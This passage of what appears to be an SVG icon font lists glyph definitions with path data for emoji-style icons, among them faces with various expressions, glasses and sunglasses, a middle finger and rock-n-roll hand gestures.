<glyph unicode="&#xebce;" glyph-name="grinning-face3" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM527.902 288c-95.902 0-143.902 32-143.902 32s32-96 144-96c112 0 144 96 144 96s-48.195-32-144.098-32v0zM597.49 518.627l90.51 90.51 90.51-90.51-22.627-22.627-67.882 67.882-67.882-67.882-22.627 22.627zM277.49 518.627l90.51 90.51 90.51-90.51-22.627-22.627-67.882 67.882-67.882-67.882-22.627 22.627z" />
<glyph unicode="&#xebcf;" glyph-name="grinning-face4" d="M528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM527.902 288c95.902 0 144.098 32 144.098 32s-32-96-144-96c-112 0-144 96-144 96s48-32 143.902-32zM597.49 518.627l90.51 90.51 90.51-90.51-22.627-22.627-67.882 67.882-67.882-67.882-22.627 22.627zM277.49 518.627l90.51 90.51 90.51-90.51-22.627-22.627-67.882 67.882-67.882-67.882-22.627 22.627z" />
<glyph unicode="&#xebd0;" glyph-name="sad-face7" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM339.889 609.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM609.995 537.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM527.902 256c-95.902 0-143.902-32-143.902-32s32 96 144 96c112 0 144-96 144-96s-48.195 32-144.098 32v0z" />
<glyph unicode="&#xebd1;" glyph-name="sad-face8" d="M528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM339.889 609.053l106.117-71.577-17.894-26.529-106.117 71.577 17.894 26.529zM609.995 537.476l106.117 71.577 17.894-26.529-106.117-71.577-17.894 26.529zM527.902 256c-95.902 0-143.902-32-143.902-32s32 96 144 96c112 0 144-96 144-96s-48.195 32-144.098 32z" />
<glyph unicode="&#xebd2;" glyph-name="sad-face9" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM627.889 609.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM321.995 537.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM527.902 256c-95.902 0-143.902-32-143.902-32s32 96 144 96c112 0 144-96 144-96s-48.195 32-144.098 32v0z" />
<glyph unicode="&#xebd3;" glyph-name="sad-face10" d="M528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM627.889 609.053l106.117-71.577-17.894-26.529-106.117 71.577 17.894 26.529zM321.995 537.476l106.117 71.577 17.894-26.529-106.117-71.577-17.894 26.529zM527.902 256c-95.902 0-143.902-32-143.902-32s32 96 144 96c112 0 144-96 144-96s-48.195 32-144.098 32z" />
<glyph unicode="&#xebd4;" glyph-name="sad-face-closed-eyes" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM320 544v-32h128v32h-128zM608 544v-32h128v32h-128zM527.902 256c-95.902 0-143.902-32-143.902-32s32 96 144 96c112 0 144-96 144-96s-48.195 32-144.098 32v0z" />
<glyph unicode="&#xebd5;" glyph-name="sad-face-closed-eyes2" d="M528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM320 544h128v-32h-128v32zM608 544h128v-32h-128v32zM527.902 256c-95.902 0-143.902-32-143.902-32s32 96 144 96c112 0 144-96 144-96s-48.195 32-144.098 32z" />
<glyph unicode="&#xebd6;" glyph-name="sad-face11" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM627.889 609.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM321.995 537.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM527.402 288c-111.402 0-175.402-64-175.402-64v32c0 0 64 64 175.402 64s176.598-64 176.598-64v-32c0 0-65.195 64-176.598 64v0z" />
<glyph unicode="&#xebd7;" glyph-name="sad-face12" d="M528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM627.889 609.053l106.117-71.577-17.894-26.529-106.117 71.577 17.894 26.529zM321.995 537.476l106.117 71.577 17.894-26.529-106.117-71.577-17.894 26.529zM527.402 288c-111.402 0-175.402-64-175.402-64v32c0 0 64 64 175.402 64s176.598-64 176.598-64v-32c0 0-65.195 64-176.598 64z" />
<glyph unicode="&#xebd8;" glyph-name="smiling-face7" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM627.889 609.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM321.995 537.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM527.402 256c-111.402 0-175.402 64-175.402 64v-32c0 0 64-64 175.402-64s176.598 64 176.598 64v32c0 0-65.195-64-176.598-64v0z" />
<glyph unicode="&#xebd9;" glyph-name="smiling-face8" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM627.889 609.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM321.995 537.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM527.402 256c-111.402 0-175.402 64-175.402 64v-32c0 0 64-64 175.402-64s176.598 64 176.598 64v32c0 0-65.195-64-176.598-64z" />
<glyph unicode="&#xebda;" glyph-name="astonished-face" d="M643.387 560l-33.393 22.524 17.894 26.529 44.111-29.753 44.111 29.753 17.894-26.529-33.393-22.524 33.393-22.524-17.894-26.529-44.111 29.753-44.111-29.753-17.894 26.529 33.393 22.524zM355.387 560l-33.393 22.524 17.894 26.529 44.111-29.753 44.111 29.753 17.894-26.529-33.393-22.524 33.393-22.524-17.894-26.529-44.111 29.753-44.111-29.753-17.894 26.529 33.393 22.524zM528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM528 192v0c-44.183 0-80 35.817-80 80s35.817 80 80 80c44.183 0 80-35.817 80-80s-35.817-80-80-80zM528 224c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0z" />
<glyph unicode="&#xebdb;" glyph-name="astonished-face2" d="M643.387 560l-33.393 22.524 17.894 26.529 44.111-29.753 44.111 29.753 17.894-26.529-33.393-22.524 33.393-22.524-17.894-26.529-44.111 29.753-44.111-29.753-17.894 26.529 33.393 22.524zM355.387 560l-33.393 22.524 17.894 26.529 44.111-29.753 44.111 29.753 17.894-26.529-33.393-22.524 33.393-22.524-17.894-26.529-44.111 29.753-44.111-29.753-17.894 26.529 33.393 22.524zM528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM528 192c-44.183 0-80 35.817-80 80s35.817 80 80 80c44.183 0 80-35.817 80-80s-35.817-80-80-80z" />
<glyph unicode="&#xebdc;" glyph-name="astonished-face3" d="M643.387 560l-33.393 22.524 17.894 26.529 44.111-29.753 44.111 29.753 17.894-26.529-33.393-22.524 33.393-22.524-17.894-26.529-44.111 29.753-44.111-29.753-17.894 26.529 33.393 22.524zM355.387 560l-33.393 22.524 17.894 26.529 44.111-29.753 44.111 29.753 17.894-26.529-33.393-22.524 33.393-22.524-17.894-26.529-44.111 29.753-44.111-29.753-17.894 26.529 33.393 22.524zM528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM528 192v0c-79.529 0-144 35.817-144 80s64.471 80 144 80c79.529 0 144-35.817 144-80s-64.471-80-144-80zM528 224c61.856 0 112 21.49 112 48s-50.144 48-112 48c-61.856 0-112-21.49-112-48s50.144-48 112-48v0z" />
<glyph unicode="&#xebdd;" glyph-name="astonished-face4" d="M643.387 560l-33.393-22.524 17.894-26.529 44.111 29.753 44.111-29.753 17.894 26.529-33.393 22.524 33.393 22.524-17.894 26.529-44.111-29.753-44.111 29.753-17.894-26.529 33.393-22.524zM355.387 560l-33.393-22.524 17.894-26.529 44.111 29.753 44.111-29.753 17.894 26.529-33.393 22.524 33.393 22.524-17.894 26.529-44.111-29.753-44.111 29.753-17.894-26.529 33.393-22.524zM528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 192c79.529 0 144 35.817 144 80s-64.471 80-144 80c-79.529 0-144-35.817-144-80s64.471-80 144-80z" />
<glyph unicode="&#xebde;" glyph-name="face-moustache" d="M528 295.738c13.894-24.865 43.804-64.755 105.767-67.675 86.233-4.064 165.083 75.936 165.083 106.014-33.232-36.332-88.747-39.597-119.622-24.686-45.461 21.955-37.567 65.41-70.707 93.845-18.836 16.162-45.588 17.131-68.488 0-4.128-3.088-8.271-7.035-12.033-11.793-3.762 4.758-7.905 8.705-12.033 11.793-22.9 17.131-49.652 16.162-68.488 0-33.14-28.435-25.246-71.891-70.707-93.845-30.875-14.911-86.39-11.645-119.622 24.686 0-30.077 78.85-110.077 165.083-106.014 61.963 2.92 91.873 42.81 105.767 67.675v0zM528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 448v0c-53.019 0-96 42.981-96 96s42.981 96 96 96c53.019 0 96-42.981 96-96s-42.981-96-96-96zM384 480c35.346 0 64 28.654 64 64s-28.654 64-64 64c-35.346 0-64-28.654-64-64s28.654-64 64-64v0zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0z" />
<glyph unicode="&#xebdf;" glyph-name="face-moustache2" d="M528 295.738c-13.894-24.865-43.804-64.755-105.767-67.675-86.233-4.064-165.083 75.936-165.083 106.014 33.232-36.332 88.747-39.597 119.622-24.686 45.461 21.955 37.567 65.41 70.707 93.845 18.836 16.162 45.588 17.131 68.488 0 4.128-3.088 8.271-7.035 12.033-11.793 3.762 4.758 7.905 8.705 12.033 11.793 22.9 17.131 49.652 16.162 68.488 0 33.14-28.435 25.246-71.891 70.707-93.845 30.875-14.911 86.39-11.645 119.622 24.686 0-30.077-78.85-110.077-165.083-106.014-61.963 2.92-91.873 42.81-105.767 67.675zM528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM384 448c-53.019 0-96 42.981-96 96s42.981 96 96 96c53.019 0 96-42.981 96-96s-42.981-96-96-96zM384 480c-35.346 0-64 28.654-64 64s28.654 64 64 64c35.346 0 64-28.654 64-64s-28.654-64-64-64zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 512c-17.673 0-32 14.327-32 32s14.327 32 32 32c17.673 0 32-14.327 32-32s-14.327-32-32-32z" />
<glyph unicode="&#xebe0;" glyph-name="face-moustache3" d="M528 295.738c13.894-24.865 43.804-64.755 105.767-67.675 86.233-4.064 165.083 75.936 165.083 106.014-33.232-36.332-88.747-39.597-119.622-24.686-45.461 21.955-37.567 65.41-70.707 93.845-18.836 16.162-45.588 17.131-68.488 0-4.128-3.088-8.271-7.035-12.033-11.793-3.762 4.758-7.905 8.705-12.033 11.793-22.9 17.131-49.652 16.162-68.488 0-33.14-28.435-25.246-71.891-70.707-93.845-30.875-14.911-86.39-11.645-119.622 24.686 0-30.077 78.85-110.077 165.083-106.014 61.963 2.92 91.873 42.81 105.767 67.675v0zM528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0z" />
<glyph unicode="&#xebe1;" glyph-name="face-moustache4" d="M528 295.738c-13.894-24.865-43.804-64.755-105.767-67.675-86.233-4.064-165.083 75.936-165.083 106.014 33.232-36.332 88.747-39.597 119.622-24.686 45.461 21.955 37.567 65.41 70.707 93.845 18.836 16.162 45.588 17.131 68.488 0 4.128-3.088 8.271-7.035 12.033-11.793 3.762 4.758 7.905 8.705 12.033 11.793 22.9 17.131 49.652 16.162 68.488 0 33.14-28.435 25.246-71.891 70.707-93.845 30.875-14.911 86.39-11.645 119.622 24.686 0-30.077-78.85-110.077-165.083-106.014-61.963 2.92-91.873 42.81-105.767 67.675zM528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM384 512c-17.673 0-32 14.327-32 32s14.327 32 32 32c17.673 0 32-14.327 32-32s-14.327-32-32-32zM672 512c-17.673 0-32 14.327-32 32s14.327 32 32 32c17.673 0 32-14.327 32-32s-14.327-32-32-32z" />
<glyph unicode="&#xebe2;" glyph-name="face-glasses" d="M835.522 634.199v0 0c-78.137 8.787-207.455 7.843-301.44-15.703-2.053-0.427-4.070-0.8-6.082-1.113-2.013 0.313-4.029 0.686-6.082 1.113-93.985 23.545-223.303 24.49-301.44 15.703v0c65.806 99.882 178.966 165.801 307.522 165.801s241.716-65.92 307.522-165.801zM859.391 592.206c23.457-48.431 36.609-102.783 36.609-160.206 0-203.241-164.759-368-368-368s-368 164.759-368 368c0 57.423 13.152 111.775 36.609 160.206 0.479-0.444 1.005-0.727 1.581-0.821 14.692-5.402 20.961-18.881 20.961-18.881s4.387-11.961 17.127-60.603c12.74-48.642 43.113-54.475 43.113-54.475s37.175-8.363 80.059-8.363c42.884 0 68.537 1.773 96.001 14.261s39.468 47.269 39.468 47.269c0 0 13.837 29.97 23.364 58.249 1.446 4.291 5.23 7.209 9.718 9.077 4.488-1.868 8.272-4.785 9.718-9.077 9.526-28.279 23.364-58.249 23.364-58.249s12.004-34.781 39.468-47.269c27.464-12.488 53.117-14.261 96.001-14.261s80.059 8.363 80.059 8.363c0 0 30.373 5.833 43.113 54.475s17.127 60.603 17.127 60.603c0 0 6.268 13.479 20.961 18.881 0.576 0.095 1.102 0.377 1.581 0.821v0 0zM528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400v0zM527.402 256c-111.402 0-175.402 64-175.402 64v-32c0 0 64-64 175.402-64s176.598 64 176.598 64v32c0 0-65.195-64-176.598-64v0zM270.084 597.852v0c15.821 10.234 74.035 10.503 94.52 10.005s58.011-3.491 94.458-14.53c36.447-11.039 14.836-48.59 12.007-56.665-4.099-11.699-16.978-32.576-30.466-41.186s-43.12-15.476-80.364-15.476c-21.628 0-39.184 0.922-56.467 4.444s-25.886 6.653-36.047 26.563c-4.398 8.617-8.121 22.731-9.651 32.973s-7.547 41.222 12.009 53.872zM785.916 597.852c19.556-12.65 13.539-43.63 12.009-53.872s-5.254-24.356-9.651-32.973c-10.161-19.91-18.764-23.041-36.047-26.563s-34.839-4.444-56.467-4.444c-37.243 0-66.876 6.866-80.364 15.476s-26.367 29.487-30.466 41.186c-2.829 8.075-24.44 45.626 12.007 56.665s73.973 14.032 94.458 14.53c20.485 0.498 78.699 0.229 94.52-10.005v0zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0z" />
<glyph unicode="&#xebe3;" glyph-name="face-glasses2" d="M528 617.383v0c2.013 0.313 4.029 0.686 6.082 1.113 102.487 25.675 246.989 24.476 321.325 13.089 8.976-1.375 10.386-38.887 2.402-40.2-14.692-5.402-20.961-18.881-20.961-18.881s-4.387-11.961-17.127-60.603c-12.74-48.642-43.113-54.475-43.113-54.475s-37.175-8.363-80.059-8.363c-42.884 0-68.537 1.773-96.001 14.261s-39.468 47.269-39.468 47.269c0 0-13.837 29.97-23.364 58.249-1.446 4.291-5.23 7.209-9.718 9.077-4.488-1.868-8.272-4.785-9.718-9.077-9.526-28.279-23.364-58.249-23.364-58.249s-12.004-34.781-39.468-47.269c-27.464-12.488-53.117-14.261-96.001-14.261s-80.059 8.363-80.059 8.363c0 0-30.373 5.833-43.113 54.475s-17.127 60.603-17.127 60.603c0 0-6.268 13.479-20.961 18.881-7.983 1.312-6.574 38.825 2.402 40.2 74.336 11.387 218.838 12.587 321.325-13.089 2.053-0.427 4.070-0.8 6.082-1.113zM528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM527.402 256c111.402 0 176.598 64 176.598 64v-32c0 0-65.195-64-176.598-64s-175.402 64-175.402 64v32c0 0 64-64 175.402-64zM270.084 597.852c15.821 10.234 74.035 10.503 94.52 10.005s58.011-3.491 94.458-14.53c36.447-11.039 14.836-48.59 12.007-56.665-4.099-11.699-16.978-32.576-30.466-41.186s-43.12-15.476-80.364-15.476c-21.628 0-39.184 0.922-56.467 4.444s-25.886 6.653-36.047 26.563c-4.398 8.617-8.121 22.731-9.651 32.973s-7.547 41.222 12.009 53.872zM785.916 597.852c19.556-12.65 13.539-43.63 12.009-53.872s-5.254-24.356-9.651-32.973c-10.161-19.91-18.764-23.041-36.047-26.563s-34.839-4.444-56.467-4.444c-37.243 0-66.876 6.866-80.364 15.476s-26.367 29.487-30.466 41.186c-2.829 8.075-24.44 45.626 12.007 56.665s73.973 14.032 94.458 14.53c20.485 0.498 78.699 0.229 94.52-10.005zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32z" />
<glyph unicode="&#xebe4;" glyph-name="face-sunglasses" d="M835.522 634.199v0c-78.137 8.787-207.455 7.843-301.44-15.703-2.053-0.427-4.070-0.8-6.082-1.113-2.013 0.313-4.029 0.686-6.082 1.113-93.985 23.545-223.303 24.49-301.44 15.703v0c65.806 99.882 178.966 165.801 307.522 165.801s241.716-65.92 307.522-165.801zM859.391 592.206c23.457-48.431 36.609-102.783 36.609-160.206 0-203.241-164.759-368-368-368s-368 164.759-368 368c0 57.423 13.152 111.775 36.609 160.206 0.479-0.444 1.005-0.727 1.581-0.821 14.692-5.402 20.961-18.881 20.961-18.881s4.387-11.961 17.127-60.603c12.74-48.642 43.113-54.475 43.113-54.475s37.175-8.363 80.059-8.363c42.884 0 68.537 1.773 96.001 14.261s39.468 47.269 39.468 47.269c0 0 13.837 29.97 23.364 58.249 1.446 4.291 5.23 7.209 9.718 9.077 4.488-1.868 8.272-4.785 9.718-9.077 9.526-28.279 23.364-58.249 23.364-58.249s12.004-34.781 39.468-47.269c27.464-12.488 53.117-14.261 96.001-14.261s80.059 8.363 80.059 8.363c0 0 30.373 5.833 43.113 54.475s17.127 60.603 17.127 60.603c0 0 6.268 13.479 20.961 18.881 0.576 0.095 1.102 0.377 1.581 0.821v0zM528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400v0zM527.402 256c-111.402 0-175.402 64-175.402 64v-32c0 0 64-64 175.402-64s176.598 64 176.598 64v32c0 0-65.195-64-176.598-64v0z" />
<glyph unicode="&#xebe5;" glyph-name="face-sunglasses2" d="M528 617.383c2.013 0.313 4.029 0.686 6.082 1.113 102.487 25.675 246.989 24.476 321.325 13.089 8.976-1.375 10.386-38.887 2.402-40.2-14.692-5.402-20.961-18.881-20.961-18.881s-4.387-11.961-17.127-60.603c-12.74-48.642-43.113-54.475-43.113-54.475s-37.175-8.363-80.059-8.363c-42.884 0-68.537 1.773-96.001 14.261s-39.468 47.269-39.468 47.269c0 0-13.837 29.97-23.364 58.249-1.446 4.291-5.23 7.209-9.718 9.077-4.488-1.868-8.272-4.785-9.718-9.077-9.526-28.279-23.364-58.249-23.364-58.249s-12.004-34.781-39.468-47.269c-27.464-12.488-53.117-14.261-96.001-14.261s-80.059 8.363-80.059 8.363c0 0-30.373 5.833-43.113 54.475s-17.127 60.603-17.127 60.603c0 0-6.268 13.479-20.961 18.881-7.983 1.312-6.574 38.825 2.402 40.2 74.336 11.387 218.838 12.587 321.325-13.089 2.053-0.427 4.070-0.8 6.082-1.113zM528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM527.402 256c111.402 0 176.598 64 176.598 64v-32c0 0-65.195-64-176.598-64s-175.402 64-175.402 64v32c0 0 64-64 175.402-64z" />
<glyph unicode="&#xebe6;" glyph-name="smirking-face-sunglasses" d="M835.522 634.199v0 0c-78.137 8.787-207.455 7.843-301.44-15.703-2.053-0.427-4.070-0.8-6.082-1.113-2.013 0.313-4.029 0.686-6.082 1.113-93.985 23.545-223.303 24.49-301.44 15.703v0c65.806 99.882 178.966 165.801 307.522 165.801s241.716-65.92 307.522-165.801zM859.391 592.206c23.457-48.431 36.609-102.783 36.609-160.206 0-203.241-164.759-368-368-368s-368 164.759-368 368c0 57.423 13.152 111.775 36.609 160.206 0.479-0.444 1.005-0.727 1.581-0.821 14.692-5.402 20.961-18.881 20.961-18.881s4.387-11.961 17.127-60.603c12.74-48.642 43.113-54.475 43.113-54.475s37.175-8.363 80.059-8.363c42.884 0 68.537 1.773 96.001 14.261s39.468 47.269 39.468 47.269c0 0 13.837 29.97 23.364 58.249 1.446 4.291 5.23 7.209 9.718 9.077 4.488-1.868 8.272-4.785 9.718-9.077 9.526-28.279 23.364-58.249 23.364-58.249s12.004-34.781 39.468-47.269c27.464-12.488 53.117-14.261 96.001-14.261s80.059 8.363 80.059 8.363c0 0 30.373 5.833 43.113 54.475s17.127 60.603 17.127 60.603c0 0 6.268 13.479 20.961 18.881 0.576 0.095 1.102 0.377 1.581 0.821v0 0zM528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400v0zM496.598 256h95.651c26.372 0 47.751 21.667 47.751 47.85v16.15h32c0 0 0-16 0-32 0-32-32-64-64-64h-224v32h112.598z" />
<glyph unicode="&#xebe7;" glyph-name="smirking-face-sunglasses2" d="M528 617.383v0c2.013 0.313 4.029 0.686 6.082 1.113 102.487 25.675 246.989 24.476 321.325 13.089 8.976-1.375 10.386-38.887 2.402-40.2-14.692-5.402-20.961-18.881-20.961-18.881s-4.387-11.961-17.127-60.603c-12.74-48.642-43.113-54.475-43.113-54.475s-37.175-8.363-80.059-8.363c-42.884 0-68.537 1.773-96.001 14.261s-39.468 47.269-39.468 47.269c0 0-13.837 29.97-23.364 58.249-1.446 4.291-5.23 7.209-9.718 9.077-4.488-1.868-8.272-4.785-9.718-9.077-9.526-28.279-23.364-58.249-23.364-58.249s-12.004-34.781-39.468-47.269c-27.464-12.488-53.117-14.261-96.001-14.261s-80.059 8.363-80.059 8.363c0 0-30.373 5.833-43.113 54.475s-17.127 60.603-17.127 60.603c0 0-6.268 13.479-20.961 18.881-7.983 1.312-6.574 38.825 2.402 40.2 74.336 11.387 218.838 12.587 321.325-13.089 2.053-0.427 4.070-0.8 6.082-1.113zM528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM496.598 256h95.651c26.372 0 47.751 21.667 47.751 47.85v16.15h32c0 0 0-16 0-32 0-32-32-64-64-64h-224v32h112.598z" />
<glyph unicode="&#xebe8;" glyph-name="middle-finger" d="M896 272v191.862c0 44.259-35.509 80.138-80 80.138-20.323 0-38.876-7.524-52.987-19.988-11.269 30.364-40.427 51.988-75.013 51.988-18.010 0-34.629-5.996-48-16.068v255.958c0 44.244-35.509 80.111-80 80.111-44.183 0-80-35.763-80-80.111v-223.769c-13.332 9.974-29.925 15.88-48 15.88-44.183 0-80-36.086-80-79.924v-27.813c-62.565 58.516-133.992 102.16-179.484 56.667-63.592-63.592 69.959-188.37 174.391-378.633 72.352-131.816 177.48-178.297 277.094-178.297 150.221 0 272 121.779 272 272zM624 32c-120.311 0.015-191.68 65.636-248.084 160.541-125.184 210.636-214.832 307.019-180.043 341.996 35.539 35.731 122.258-41.671 188.127-112.084v105.64c0 26.414 21.49 47.907 48 47.907 26.694 0 48-21.449 48-47.907v-80.093h32v368.291c0 26.070 21.49 47.709 48 47.709 26.694 0 48-21.36 48-47.709v-336.291h32v16.093c0 26.414 21.49 47.907 48 47.907 26.694 0 48-21.449 48-47.907v-48.093h32v15.946c0 26.576 21.49 48.054 48 48.054 26.694 0 48-21.514 48-48.054v-191.946c0-132.548-107.452-240-240-240v0z" />
<glyph unicode="&#xebe9;" glyph-name="middle-finger2" d="M867.685 272c0-132.548-107.452-240-240-240-0.013 0-0.027 0-0.040 0-120.271 0.015-191.64 65.636-248.044 160.541-125.184 210.636-214.832 307.019-180.043 341.996 35.539 35.731 122.258-41.671 188.127-112.084v137.341c0 26.717 21.49 48.206 48 48.206 26.694 0 48-21.583 48-48.206v-79.794h24.186c2.575 1.486 5.18 2.926 7.814 4.319v0 331.973c0 26.070 21.49 47.709 48 47.709 26.694 0 48-21.36 48-47.709v-304.291h32v48.143c0 26.112 21.49 47.857 48 47.857 26.694 0 48-21.427 48-47.857v-75.824c2.634-1.392 5.239-2.832 7.814-4.319h24.186v47.795c0 26.558 21.49 48.205 48 48.205 26.694 0 48-21.582 48-48.205v-255.795z" />
<glyph unicode="&#xebea;" glyph-name="rock-n-roll" d="M896 304v384.236c0 44.053-35.509 79.764-80 79.764-44.183 0-80-35.639-80-79.764v-96.115c-13.332 9.974-29.925 15.88-48 15.88-20.302 0-38.837-7.619-52.943-20.108-11.236 30.427-40.426 52.108-75.057 52.108-18.010 0-34.629-5.996-48-16.068v159.799c0 44.331-35.509 80.269-80 80.269-44.183 0-80-35.693-80-80.269v-251.468c-62.565 58.516-133.992 102.16-179.484 56.667-63.592-63.592 69.959-188.37 174.391-378.633 72.352-131.816 177.48-178.297 277.094-178.297 150.221 0 272 121.779 272 272zM624 64c-120.311 0.015-191.68 65.636-248.084 160.541-125.184 210.636-214.832 307.019-180.043 341.996 35.539 35.731 122.258-41.671 188.127-112.084v329.271c0 26.951 21.49 48.276 48 48.276 26.694 0 48-21.614 48-48.276v-303.724h32v80.093c0 26.414 21.49 47.907 48 47.907 26.694 0 48-21.449 48-47.907v-48.093h32v16.093c0 26.414 21.49 47.907 48 47.907 26.694 0 48-21.449 48-47.907v-48.093h32v208.28c0 26.519 21.49 47.72 48 47.72 26.694 0 48-21.365 48-47.72v-384.28c0-132.548-107.452-240-240-240v0z" />
<glyph unicode="&#xebeb;" glyph-name="rock-n-roll2" d="M608 512v47.848c0 26.593-21.306 48.152-48 48.152-26.51 0-48-21.386-48-48.152v-79.848h-32v303.832c0 26.602-21.306 48.168-48 48.168-26.51 0-48-21.348-48-48.168v-312.048c-64.334 70.184-148.749 146.785-184.134 111.209-34.789-34.977 49.818-131.421 175.002-342.057 14.735-24.793 30.491-47.588 47.874-67.736 42.812-65.738 116.959-109.2 201.258-109.2 132.548 0 240 107.452 240 240v384.28c0 26.355-21.306 47.72-48 47.72-26.51 0-48-21.201-48-47.72v-208.28h-32v47.848c0 26.593-21.306 48.152-48 48.152-26.51 0-48-21.386-48-48.152v-15.848h-32z" />
